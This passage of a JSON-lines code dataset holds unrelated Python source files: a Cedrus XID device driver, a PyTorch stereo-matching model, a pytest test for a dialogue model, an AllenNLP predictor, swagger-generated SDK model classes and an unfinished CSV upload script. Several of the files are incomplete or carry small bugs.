Due to this, the dict returned by\n XidDevice.get_next_response() returns 0 for the reaction time value.\n\n This issue will be resolved in a future release of this library.\n \"\"\"\n def __init__(self, xid_connection):\n self.con = xid_connection\n self._impl = None\n self.init_device()\n\n def __del__(self):\n self.con.close()\n del self.con\n\n def is_stimtracker(self):\n return isinstance(self._impl, StimTracker)\n\n def is_response_device(self):\n return isinstance(self._impl, ResponseDevice)\n\n def init_device(self):\n \"\"\"\n Initializes the device with the proper keymaps and name\n \"\"\"\n try:\n product_id = int(self._send_command('_d2', 1))\n except ValueError:\n product_id = self._send_command('_d2', 1)\n\n if product_id == 0:\n self._impl = ResponseDevice(\n self.con,\n 'Cedrus Lumina LP-400 Response Pad System',\n lumina_keymap)\n elif product_id == 1:\n self._impl = ResponseDevice(\n self.con,\n 'Cedrus SV-1 Voice Key',\n None,\n 'Voice Response')\n elif product_id == 2:\n model_id = int(self._send_command('_d3', 1))\n if model_id == 1:\n self._impl = ResponseDevice(\n self.con,\n 'Cedrus RB-530',\n rb_530_keymap)\n elif model_id == 2:\n self._impl = ResponseDevice(\n self.con,\n 'Cedrus RB-730',\n rb_730_keymap)\n elif model_id == 3:\n self._impl = ResponseDevice(\n self.con,\n 'Cedrus RB-830',\n rb_830_keymap)\n elif model_id == 4:\n self._impl = ResponseDevice(\n self.con,\n 'Cedrus RB-834',\n rb_834_keymap)\n else:\n raise XidError('Unknown RB Device')\n elif product_id == 4:\n self._impl = StimTracker(\n self.con,\n 'Cedrus C-POD')\n elif product_id == b'S':\n self._impl = StimTracker(\n self.con,\n 'Cedrus StimTracker')\n\n elif product_id == -99:\n raise XidError('Invalid XID device')\n\n def _send_command(self, command, expected_bytes):\n \"\"\"\n Send an XID command to the device\n \"\"\"\n response = self.con.send_xid_command(command, expected_bytes)\n\n return response\n\n def __getattr__(self, attrname):\n return getattr(self._impl, attrname)\n\n def __repr__(self):\n if self._impl is not None:\n return str(self._impl)\n else:\n return 'Uninitialized XID device'\n"} {"ext": "py", "sha": "1a30897fffd3f594588bafc0f4bc881cbfbae8b0", "content": "import csv\nimport requests\ndf = open(\"bridgeData3.csv\",'r').readlines()\nfin = open('final.csv','r').readlines()\nfinCsv = fin[1:]\n# url = https://b2ptc.herokuapp.com/bridges\nfinalCsv = df[1:]\nobj = {}\nfor i in finalCsv:\n x = i.split(',')\n obj[x[1]] = {'bridge_name':x[0],'proj_code':x[1],'before_img':x[2],'after_img':x[3]}\n\nprint(finCsv[0]) \nfor i in finCsv:\n if \n \n# for i in finalCsv:\n# x = i.split(',')\n# requests.put(url+x[0],data={before:x[2],after:x[3]})\n# pull each id,before image and after from df\n# for each data item do a put request with the id as the param id \n# and then put the before and after image in an dict and place it as the data for the put request\n"} {"ext": "py", "sha": "1a308a2587ccd68fe03943fc982dc858bb9631a3", "content": "# -*- coding: utf-8 -*-\n# @Author: yulidong\n# @Date: 2018-07-17 10:44:43\n# @Last Modified by: yulidong\n# @Last Modified time: 2018-08-27 18:45:39\n# -*- coding: utf-8 -*-\n# @Author: lidong\n# @Date: 2018-03-20 18:01:52\n# @Last Modified by: yulidong\n# @Last Modified time: 2018-07-16 22:16:14\nimport time\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport math\nfrom math import ceil\nfrom torch.autograd import Variable\nfrom torch.nn.functional import cosine_similarity as cosine_s\nfrom pssm import caffe_pb2\nfrom pssm.models.utils import 
*\nrsn_specs = {\n 'scene': \n {\n 'n_classes': 9,\n 'input_size': (540, 960),\n 'block_config': [3, 4, 23, 3],\n },\n\n}\n\ngroup_dim=8\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"\"\"3x3 convolution with padding\"\"\"\n\n if stride==1:\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n if stride==2:\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=2, bias=False) \nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(BasicBlock, self).__init__()\n self.conv1 = conv3x3(inplanes, planes, stride)\n self.gn1 = nn.GroupNorm(group_dim,planes)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = conv3x3(planes, planes)\n self.gn2 = nn.GroupNorm(group_dim,planes)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.gn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.gn2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n # print(residual.shape)\n # print(out.shape)\n out += residual\n out = self.relu(out)\n\n return out\nclass feature_extraction(nn.Module):\n def __init__(self):\n super(feature_extraction, self).__init__()\n self.inplanes = 32\n self.layer1 = self._make_layer(BasicBlock, 32, 3, 1,1,1)\n\n self.branch1 = nn.Sequential(nn.AvgPool2d((54, 96), stride=(54,96)),\n nn.Conv2d(32, 8, 1, 1, 0, 1),\n nn.GroupNorm(4,8),\n nn.ReLU(inplace=True))\n\n self.branch2 = nn.Sequential(nn.AvgPool2d((27, 48), stride=(27,48)),\n nn.Conv2d(32, 8, 1, 1, 0, 1),\n nn.GroupNorm(4,8),\n nn.ReLU(inplace=True))\n\n self.branch3 = nn.Sequential(nn.AvgPool2d((36, 64), stride=(36,64)),\n nn.Conv2d(32, 8, 1, 1, 0, 1),\n nn.GroupNorm(4,8),\n nn.ReLU(inplace=True))\n\n self.branch4 = nn.Sequential(nn.AvgPool2d((18, 32), stride=(18,32)),\n nn.Conv2d(32, 8, 1, 1, 0, 1),\n nn.GroupNorm(4,8),\n nn.ReLU(inplace=True))\n self.branch5 = nn.Sequential(nn.AvgPool2d((9, 16), stride=(9,16)),\n nn.Conv2d(32, 8, 1, 1, 0, 1),\n nn.GroupNorm(4,8),\n nn.ReLU(inplace=True))\n self.branch6 = nn.Sequential(nn.AvgPool2d((3, 8), stride=(3,8)),\n nn.Conv2d(32, 8, 1, 1, 0, 1),\n nn.GroupNorm(4,8),\n nn.ReLU(inplace=True))\n\n\n self.lastconv = nn.Sequential(nn.Conv2d(80, 64, 3, 1, 1, 1),\n nn.GroupNorm(group_dim,64),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 32, 3, 1, 1, 1),\n nn.GroupNorm(group_dim,32),\n nn.ReLU(inplace=True), \n )\n\n def _make_layer(self, block, planes, blocks, stride, pad, dilation):\n downsample = None\n\n layers = []\n layers.append(block(self.inplanes, planes, stride))\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes,1))\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n # output = self.conv1(x)\n # output = self.gn1(output)\n # output = self.relu1(output)\n # output = self.conv2(output)\n # output = self.gn2(output)\n # output = self.relu2(output)\n # output = self.conv3(output)\n # output = self.gn3(output)\n # output = self.relu3(output)\n output_skip = self.layer1(x)\n # output_skip=x\n\n output_branch1 = self.branch1(output_skip)\n output_branch1 = F.interpolate(output_branch1, (output_skip.size()[2],output_skip.size()[3]),mode='bilinear',align_corners=True)\n\n output_branch2 = self.branch2(output_skip)\n output_branch2 = F.interpolate(output_branch2, (output_skip.size()[2],output_skip.size()[3]),mode='bilinear',align_corners=True)\n\n output_branch3 = 
self.branch3(output_skip)\n output_branch3 = F.interpolate(output_branch3, (output_skip.size()[2],output_skip.size()[3]),mode='bilinear',align_corners=True)\n\n output_branch4 = self.branch4(output_skip)\n output_branch4 = F.interpolate(output_branch4, (output_skip.size()[2],output_skip.size()[3]),mode='bilinear',align_corners=True)\n\n output_branch5 = self.branch5(output_skip)\n output_branch5 = F.interpolate(output_branch5, (output_skip.size()[2],output_skip.size()[3]),mode='bilinear',align_corners=True)\n\n output_branch6 = self.branch6(output_skip)\n output_branch6 = F.interpolate(output_branch6, (output_skip.size()[2],output_skip.size()[3]),mode='bilinear',align_corners=True)\n\n output_feature = torch.cat((output_skip, output_branch6, output_branch5, output_branch4, output_branch3, output_branch2, output_branch1), 1)\n output_feature = self.lastconv(output_feature)\n #print(output_feature.shape)\n return output_feature\n\nclass feature_extraction2(nn.Module):\n def __init__(self):\n super(feature_extraction2, self).__init__()\n self.inplanes = 32\n self.conv1 = nn.Conv2d(3, 32, kernel_size=3, stride=1, padding=1,\n bias=False,dilation=1)\n self.gn1 = nn.GroupNorm(group_dim,32)\n self.relu1 = nn.ReLU(inplace=True)\n self.conv2 = nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=1,\n bias=False,dilation=1)\n self.gn2 = nn.GroupNorm(group_dim,32)\n self.relu2 = nn.ReLU(inplace=True)\n self.conv3 = nn.Conv2d(32, 32, kernel_size=7, stride=1, padding=6,\n bias=False,dilation=2)\n self.gn3 = nn.GroupNorm(group_dim,32)\n self.relu3 = nn.ReLU(inplace=True)\n self.layer1 = self._make_layer(BasicBlock, 32, 1, 1,1,1)\n\n def _make_layer(self, block, planes, blocks, stride, pad, dilation):\n downsample = None\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample))\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes,1,None,))\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n output = self.conv1(x)\n output = self.gn1(output)\n output = self.relu1(output)\n output = self.conv2(output)\n output = self.gn2(output)\n output = self.relu2(output)\n output = self.conv3(output)\n output = self.gn3(output)\n output = self.relu3(output)\n #print(output.shape)\n output = self.layer1(output)\n\n\n return output\n\nclass ss_argmin(nn.Module):\n def __init__(self):\n super(ss_argmin, self).__init__()\n self.softmax = nn.Softmax(dim=-1)\n\n\n\n def forward(self,x,min,max):\n one=torch.ones(1)\n zero=torch.zeros(1)\n x=self.softmax(x)\n index=torch.ones_like(x)*torch.range(min,max)\n disparity= torch.sum(x*index,dim=-1)\n v,i=torch.topk(x,k=1,dim=-1)\n mask_1=torch.squeeze(torch.where(v>0.7,one,zero))\n v,i=torch.topk(x,k=5,dim=-1)\n v_sum=torch.sum(v,-1)\n mask_2=torch.squeeze(torch.where(v_s>0.7,one,zero))\n i_dis=torch.max(i,-1)[0]-torch.min(i,-1)[0]\n mask_3=torch.squeeze(torch.where(i_dis<6,one,zero))\n mask=mask_1+mask_2*mask_3\n mask=torch.where(mask>0,one,zero)\n return disparity*mask\n\n\n\nclass rstereo(nn.Module):\n\n\n def __init__(self, \n n_classes=9, \n block_config=[3, 4, 6, 3], \n input_size= (480, 640), \n version='scene'):\n\n super(rstereo, self).__init__()\n self.feature_extraction=feature_extraction().cuda(0)\n self.feature_extraction2=feature_extraction2().cuda(0)\n # self.aggregation_sparse=aggregation_sparse()\n # self.aggregation_dense=aggregation_dense() \n self.ss_argmin=ss_argmin()\n # self.refinement_sparse=aggregation_sparse()\n # self.refinement_dense=aggregation_dense() \n\n def 
crop(self,x):\n index=(x==1).nonzero()\n return torch.min(index[:,0]),torch.max(index[:,0])+1,torch.min(index[:,1]),torch.max(index[:,1]+1)\n def cluster(feature,mask):\n count=torch.sum(mask)\n mean=torch.sum(torch.sum(feature,dim=-1),dim=-1)/count\n weights=torch.where(mask==ones,torch.norm(feature-mean,dim=1),zeros)\n weights=torch.exp(weights/torch.max(weights)).view(weights.shape[0],weights.shape[1],1)\n return weights\n def forward(self, l,r,P,pre1,pre2):\n #self.P=P[1,0]\n #0 l to r,1 min,2 max\n #[l_box,r_box,match],[min_d,max_d]\n self.pre=pre1\n self.pre2=pre2\n P1=P[...,0]\n P2=P[...,3]\n P3=P[...,1]\n P4=P[...,2]\n #feature extraction\n l_mask=P2-P1\n s_mask=P1\n #l_mask=l_mask.byte()\n #s_mask=s_mask.byte()\n #basic cuda 524\n #print(l.type)\n #1923\n #print(torch.cuda.memory_allocated(1))\n #2727\n l_sf=self.feature_extraction2(l)\n l_lf=self.feature_extraction(l_sf)\n\n #print(torch.cuda.memory_allocated(2))\n #the cuda won't copy the volume to the new gpu\n # a=l_lf.cuda(1)\n # b=l_lf.cuda(2)\n # c=l_sf.cuda(3)\n r_sf=self.feature_extraction2(r)\n r_lf=self.feature_extraction(r_sf)\n #print(torch.cuda.memory_allocated(1))\n #3267\n \n #print(torch.cuda.memory_allocated(2))\n #reshape the mask to batch and channel\n\n disparity=torch.zeros([540,960]).cuda(2)\n one=torch.ones(1).cuda(2)\n zero=torch.zeros(1).cuda(2)\n cost_volume=[]\n #5710\n #print(value)\n l_lf=l_lf.cuda(2)\n r_lf=r_lf.cuda(2)\n r_sf=r_sf.cuda(2)\n l_sf=l_sf.cuda(2)\n #985\n #feature=torch.masked_select(l_sf,s_mask)\n #feature=torch.masked_select(l_lf,l_mask)+torch.masked_select(l_sf,s_mask)\n feature=l_lf*l_mask+l_sf*s_mask\n feature=torch.where((l_mask+s_mask)>0,feature,l_lf)\n\n s_match=s_mask.long().nonzero()\n s_feature=l_sf[...,s_match[:,0],s_match[:,1]]\n l_match=l_mask.long().nonzero()\n l_feature=l_lf[...,l_match[:,0],l_match[:,1]]\n start_time=time.time()\n\n #0.0003\n #s_r_o_t=r_sf[...,s_match[:,0],s_match[:,1]]\n #1,32,n\n #print(time.time()-start_time)\n #print(s_match.shape)\n #time 10\n # for i in range(s_match.shape[0]):\n # min_d=torch.max(s_match[i,1]-300,zero.long())\n # #print(min_d)\n # s_r_o_t=r_sf[...,s_match[i,0],min_d:s_match[i,1]]\n \n # a=s_feature[...,i].view(1,32,1)\n # #print(a.shape,s_r_o_t.shape)\n # cost_volume.append(torch.where(s_match[i,1]-300>=0,cosine_s(a,s_r_o_t),zero))\n #time 0.23,192,0.035,30, the number of the match points won't influence the time,only the iteration\n\n # for i in range(300):\n # s_r_o_t=r_sf[...,s_match[:,0],s_match[:,1]-i]\n # cost_volume.append(torch.where(s_match[:,1]-i>=0,cosine_s(s_feature,s_r_o_t),zero))\n # l_r_o_t=r_sf[...,l_match[:,0],l_match[:,1]-i]\n # cost_volume.append(torch.where(l_match[:,1]-i>=0,cosine_s(l_feature,l_r_o_t),zero)) \n # #cost_volume=torch.stack(cost_volume)\n # print(torch.cuda.memory_allocated(2))\n # print(time.time()-start_time)\n # time.sleep(100)\n \n #promotion\n #we can segment with bounding box and divide the whole image into many parts\n #each single bounding box will be managed through network not the whole image\n #matching cost computation\n count=0\n start_time=time.time()\n for i in range(torch.max(P3).type(torch.int32)+1):\n #ground 0-270, sky 0-40\n # if i==13 or i == 14:\n # continue\n # i=60\n #print(pre2.shape)\n #i=14\n min_d=pre1[0,0,i].long()\n max_d=pre1[0,1,i].long()\n object_mask=torch.where(P3==i,one,zero)\n x1,y1,x2,y2,size=pre2[0,i].long()\n object_mask=object_mask[0,x1:x2,y1:y2]\n s_mask_o=object_mask*s_mask[0,x1:x2,y1:y2]\n l_mask_o=object_mask*l_mask[0,x1:x2,y1:y2]\n 
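# note (added, descriptive only): the statements below gather the masked sparse/dense pixel coordinates for this object, then score each candidate disparity in [min_d, max_d) with cosine similarity to build the per-object cost lists.\n            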
s_match=s_mask_o.long().nonzero()\n l_match=l_mask_o.long().nonzero()\n if s_match.shape[0]==0:\n s_match=object_mask.nonzero()\n if l_match.shape[0]==0:\n l_match=object_mask.nonzero()\n s_l_o=feature[...,s_match[:,0],s_match[:,1]]\n l_l_o=feature[...,l_match[:,0],l_match[:,1]]\n #print(torch.max(min_d,zero).long())\n #s_r_o=feature[...,s_match[:,0],s_match[:,1]]\n\n # s_r_o=r_sf[...,x1:x2,y1-max_d:y2-min_d]\n # l_r_o=r_lf[...,x1:x2,y1-max_d:y2-min_d]\n cost_s=[]\n cost_l=[]\n #ground and sky\n #print(s_match.shape[0],l_match.shape[0],min_d,max_d)\n \n for j in range(min_d,max_d):\n s_r_o_t=r_sf[...,s_match[:,0],s_match[:,1]-j]\n cost_s.append(torch.where(s_match[:,1]-j>=0,cosine_s(s_l_o,s_r_o_t),zero))\n l_r_o_t=r_lf[...,l_match[:,0],l_match[:,1]-j]\n cost_l.append(torch.where(l_match[:,1]-j>=0,cosine_s(l_l_o,l_r_o_t),zero))\n cost_s=torch.stack(cost_s,-1)\n cost_l=torch.stack(cost_l,-1)\n \n #cost_volume=cost_s+cost_l\n #print(torch.cuda.memory_allocated(2)/1e+6)\n #time.sleep(30)\n print(time.time()-start_time)\n time.sleep(100)\n return cost_volume\n\n\n"} {"ext": "py", "sha": "1a308d089d78cb73121ee6479a4167fb0f4c76a3", "content": "import pytest\nimport random\nimport tensorflow as tf\nfrom run import run\nfrom main import main\nimport os\nimport json\nimport shutil\ncwd = os.path.abspath(os.path.dirname(__file__))\npath = os.path.join(cwd, '..', 'cotk')\n\ndef setup_function(function):\n\timport sys\n\tsys.argv = ['python3']\n\trandom.seed(0)\n\timport numpy as np\n\tnp.random.seed(0)\n\ttf.set_random_seed(0)\n\ttry:\n\t\tshutil.rmtree(cwd + '/output_test')\n\texcept Exception:\n\t\tpass\n\ttry:\n\t\tshutil.rmtree(cwd + '/tensorboard_test')\n\texcept Exception:\n\t\tpass\n\ttry:\n\t\tshutil.rmtree(cwd + '/model_test')\n\texcept Exception:\n\t\tpass\n\ttry:\n\t\tshutil.rmtree(cwd + '/cache_test')\n\texcept Exception:\n\t\tpass\n\tos.mkdir(cwd + '/output_test')\n\tos.mkdir(cwd + '/tensorboard_test')\n\tos.mkdir(cwd + '/model_test')\n\tos.mkdir(cwd + '/cache_test')\n\ndef teardown_function(function):\n\tshutil.rmtree(cwd + '/output_test')\n\tshutil.rmtree(cwd + '/tensorboard_test')\n\tshutil.rmtree(cwd + '/model_test')\n\tshutil.rmtree(cwd + '/cache_test')\n\ndef modify_args(args):\n\targs.cuda = False\n\targs.restore = None\n\targs.wvclass = 'Glove'\n\targs.wvpath = path + '/tests/wordvector/dummy_glove/300d'\n\targs.embedding_size=300 #must be the same as the dim of wvpath\n\targs.out_dir = cwd + '/output_test'\n\targs.log_dir = cwd + '/tensorboard_test'\n\targs.model_dir = cwd + '/model_test'\n\targs.cache_dir = cwd + '/cache_test'\n\n\targs.name = 'test_hred_tensorflow'\n\targs.epochs = 1\n\targs.checkpoint_steps = 1\n\targs.datapath = path + '/tests/dataloader/dummy_ubuntucorpus#Ubuntu'\n\ndef test_train(mocker):\n\tdef side_effect_train(args):\n\t\tmodify_args(args)\n\t\targs.mode = 'train'\n\t\tmain(args)\n\tdef side_effect_restore(args):\n\t\tmodify_args(args)\n\t\targs.mode = 'train'\n\t\targs.restore = 'last'\n\t\tmain(args)\n\tdef side_effect_cache(args):\n\t\tmodify_args(args)\n\t\targs.mode = 'train'\n\t\targs.cache = True\n\t\tmain(args)\n\tmock = mocker.patch('main.main', side_effect=side_effect_train)\n\trun()\n\ttf.reset_default_graph()\n\tmock.side_effect = side_effect_restore\n\trun()\n\ttf.reset_default_graph()\n\tmock.side_effect = side_effect_cache\n\trun()\n\ttf.reset_default_graph()\n\ndef test_test(mocker):\n\tdef side_effect_test(args):\n\t\tmodify_args(args)\n\t\targs.mode = 'test'\n\t\tmain(args)\n\tmock = mocker.patch('main.main', 
side_effect=side_effect_test)\n\trun()\n\told_res = json.load(open(\"./result.json\", \"r\"))\n\ttf.reset_default_graph()\n\trun()\n\tnew_res = json.load(open(\"./result.json\", \"r\"))\n\tfor key in old_res:\n\t\tif key[-9:] == 'hashvalue':\n\t\t\tassert old_res[key] == new_res[key]\n\ttf.reset_default_graph()\n"} {"ext": "py", "sha": "1a308d2eb8235c1bc63463b8113b70194885403a", "content": "from overrides import overrides\n\nfrom allennlp.common.util import JsonDict\nfrom allennlp.data import DatasetReader, Instance\nfrom allennlp.data.tokenizers import WordTokenizer\nfrom allennlp.models import Model\nfrom allennlp.service.predictors.predictor import Predictor\n\n\n@Predictor.register('simple-tagger')\nclass SimpleTaggerPredictor(Predictor):\n \"\"\"\n Wrapper for the :class:`~allennlp.models.bidaf.SimpleTagger` model.\n \"\"\"\n def __init__(self, model: Model, dataset_reader: DatasetReader) -> None:\n super(SimpleTaggerPredictor, self).__init__(model, dataset_reader)\n self._tokenizer = WordTokenizer()\n\n @overrides\n def _json_to_instance(self, json: JsonDict) -> Instance:\n \"\"\"\n Expects JSON that looks like ``{\"sentence\": \"...\"}``\n and returns JSON that looks like\n ``{\"tags\": [...], \"class_probabilities\": [[...], ..., [...]]}``\n \"\"\"\n sentence = json[\"sentence\"]\n tokens, _ = self._tokenizer.tokenize(sentence)\n return self._dataset_reader.text_to_instance(tokens)\n"} {"ext": "py", "sha": "1a308ea479edb3858ce003e0ab30bf31df5b85c1", "content": "# coding: utf-8\n\n\"\"\"\n Intersight REST API\n\n This is Intersight REST API \n\n OpenAPI spec version: 1.0.9-961\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom pprint import pformat\nfrom six import iteritems\nimport re\n\n\nclass TaskWorkflowActionRef(object):\n \"\"\"\n NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\n \"\"\"\n\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'moid': 'str',\n 'object_type': 'str',\n 'selector': 'str'\n }\n\n attribute_map = {\n 'moid': 'Moid',\n 'object_type': 'ObjectType',\n 'selector': 'Selector'\n }\n\n def __init__(self, moid=None, object_type=None, selector=None):\n \"\"\"\n TaskWorkflowActionRef - a model defined in Swagger\n \"\"\"\n\n self._moid = None\n self._object_type = None\n self._selector = None\n\n if moid is not None:\n self.moid = moid\n if object_type is not None:\n self.object_type = object_type\n if selector is not None:\n self.selector = selector\n\n @property\n def moid(self):\n \"\"\"\n Gets the moid of this TaskWorkflowActionRef.\n The Moid of the referenced REST resource. \n\n :return: The moid of this TaskWorkflowActionRef.\n :rtype: str\n \"\"\"\n return self._moid\n\n @moid.setter\n def moid(self, moid):\n \"\"\"\n Sets the moid of this TaskWorkflowActionRef.\n The Moid of the referenced REST resource. \n\n :param moid: The moid of this TaskWorkflowActionRef.\n :type: str\n \"\"\"\n\n self._moid = moid\n\n @property\n def object_type(self):\n \"\"\"\n Gets the object_type of this TaskWorkflowActionRef.\n The Object Type of the referenced REST resource. 
\n\n :return: The object_type of this TaskWorkflowActionRef.\n :rtype: str\n \"\"\"\n return self._object_type\n\n @object_type.setter\n def object_type(self, object_type):\n \"\"\"\n Sets the object_type of this TaskWorkflowActionRef.\n The Object Type of the referenced REST resource. \n\n :param object_type: The object_type of this TaskWorkflowActionRef.\n :type: str\n \"\"\"\n\n self._object_type = object_type\n\n @property\n def selector(self):\n \"\"\"\n Gets the selector of this TaskWorkflowActionRef.\n An OData $filter expression which describes the REST resource to be referenced. This field may be set instead of 'moid' by clients. If 'moid' is set this field is ignored. If 'selector' is set and 'moid' is empty/absent from the request, Intersight will determine the Moid of the resource matching the filter expression and populate it in the MoRef that is part of the object instance being inserted/updated to fulfill the REST request. An error is returned if the filter matches zero or more than one REST resource. An example filter string is: Serial eq '3AA8B7T11'. \n\n :return: The selector of this TaskWorkflowActionRef.\n :rtype: str\n \"\"\"\n return self._selector\n\n @selector.setter\n def selector(self, selector):\n \"\"\"\n Sets the selector of this TaskWorkflowActionRef.\n An OData $filter expression which describes the REST resource to be referenced. This field may be set instead of 'moid' by clients. If 'moid' is set this field is ignored. If 'selector' is set and 'moid' is empty/absent from the request, Intersight will determine the Moid of the resource matching the filter expression and populate it in the MoRef that is part of the object instance being inserted/updated to fulfill the REST request. An error is returned if the filter matches zero or more than one REST resource. An example filter string is: Serial eq '3AA8B7T11'. 
\n\n :param selector: The selector of this TaskWorkflowActionRef.\n :type: str\n \"\"\"\n\n self._selector = selector\n\n def to_dict(self):\n \"\"\"\n Returns the model properties as a dict\n \"\"\"\n result = {}\n\n for attr, _ in iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"\n Returns the string representation of the model\n \"\"\"\n return pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"\n For `print` and `pprint`\n \"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"\n Returns true if both objects are equal\n \"\"\"\n if not isinstance(other, TaskWorkflowActionRef):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"\n Returns true if both objects are not equal\n \"\"\"\n return not self == other\n"} {"ext": "py", "sha": "1a308ef468987d1e48ff90d4af4109147de63be1", "content": "# coding: utf-8\n\n\"\"\"\n Isilon SDK\n\n Isilon SDK - Language bindings for the OneFS API # noqa: E501\n\n OpenAPI spec version: 9\n Contact: sdk@isilon.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom isi_sdk_8_2_2.models.node_state_servicelight_extended import NodeStateServicelightExtended # noqa: F401,E501\n\n\nclass NodeStateNodeServicelight(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'enabled': 'bool',\n 'present': 'bool',\n 'supported': 'bool',\n 'valid': 'bool'\n }\n\n attribute_map = {\n 'enabled': 'enabled',\n 'present': 'present',\n 'supported': 'supported',\n 'valid': 'valid'\n }\n\n def __init__(self, enabled=None, present=None, supported=None, valid=None): # noqa: E501\n \"\"\"NodeStateNodeServicelight - a model defined in Swagger\"\"\" # noqa: E501\n\n self._enabled = None\n self._present = None\n self._supported = None\n self._valid = None\n self.discriminator = None\n\n self.enabled = enabled\n if present is not None:\n self.present = present\n if supported is not None:\n self.supported = supported\n if valid is not None:\n self.valid = valid\n\n @property\n def enabled(self):\n \"\"\"Gets the enabled of this NodeStateNodeServicelight. # noqa: E501\n\n The node service light state (True = on). # noqa: E501\n\n :return: The enabled of this NodeStateNodeServicelight. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._enabled\n\n @enabled.setter\n def enabled(self, enabled):\n \"\"\"Sets the enabled of this NodeStateNodeServicelight.\n\n The node service light state (True = on). # noqa: E501\n\n :param enabled: The enabled of this NodeStateNodeServicelight. 
# noqa: E501\n :type: bool\n \"\"\"\n if enabled is None:\n raise ValueError(\"Invalid value for `enabled`, must not be `None`\") # noqa: E501\n\n self._enabled = enabled\n\n @property\n def present(self):\n \"\"\"Gets the present of this NodeStateNodeServicelight. # noqa: E501\n\n This node has a service light. # noqa: E501\n\n :return: The present of this NodeStateNodeServicelight. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._present\n\n @present.setter\n def present(self, present):\n \"\"\"Sets the present of this NodeStateNodeServicelight.\n\n This node has a service light. # noqa: E501\n\n :param present: The present of this NodeStateNodeServicelight. # noqa: E501\n :type: bool\n \"\"\"\n\n self._present = present\n\n @property\n def supported(self):\n \"\"\"Gets the supported of this NodeStateNodeServicelight. # noqa: E501\n\n This node supports a service light. # noqa: E501\n\n :return: The supported of this NodeStateNodeServicelight. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._supported\n\n @supported.setter\n def supported(self, supported):\n \"\"\"Sets the supported of this NodeStateNodeServicelight.\n\n This node supports a service light. # noqa: E501\n\n :param supported: The supported of this NodeStateNodeServicelight. # noqa: E501\n :type: bool\n \"\"\"\n\n self._supported = supported\n\n @property\n def valid(self):\n \"\"\"Gets the valid of this NodeStateNodeServicelight. # noqa: E501\n\n The node service light state is valid (False = Error). # noqa: E501\n\n :return: The valid of this NodeStateNodeServicelight. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._valid\n\n @valid.setter\n def valid(self, valid):\n \"\"\"Sets the valid of this NodeStateNodeServicelight.\n\n The node service light state is valid (False = Error). # noqa: E501\n\n :param valid: The valid of this NodeStateNodeServicelight. 
# noqa: E501\n :type: bool\n \"\"\"\n\n self._valid = valid\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, NodeStateNodeServicelight):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n"} {"ext": "py", "sha": "1a308f2c8f1db82442861d3d91dbcaec7ed42ecc", "content": "__classification__ = 'UNCLASSIFIED'\n__author__ = \"Thomas McCullough\"\n\nimport os\nimport re\nimport logging\nfrom typing import List\n\n\nlogger = logging.getLogger('validation')\n\n_the_directory = os.path.split(__file__)[0]\nurn_mapping = {\n 'urn:SIDD:1.0.0': {\n 'ism_urn': 'urn:us:gov:ic:ism',\n 'sfa_urn': 'urn:SFA:1.2.0',\n 'sicommon_urn': 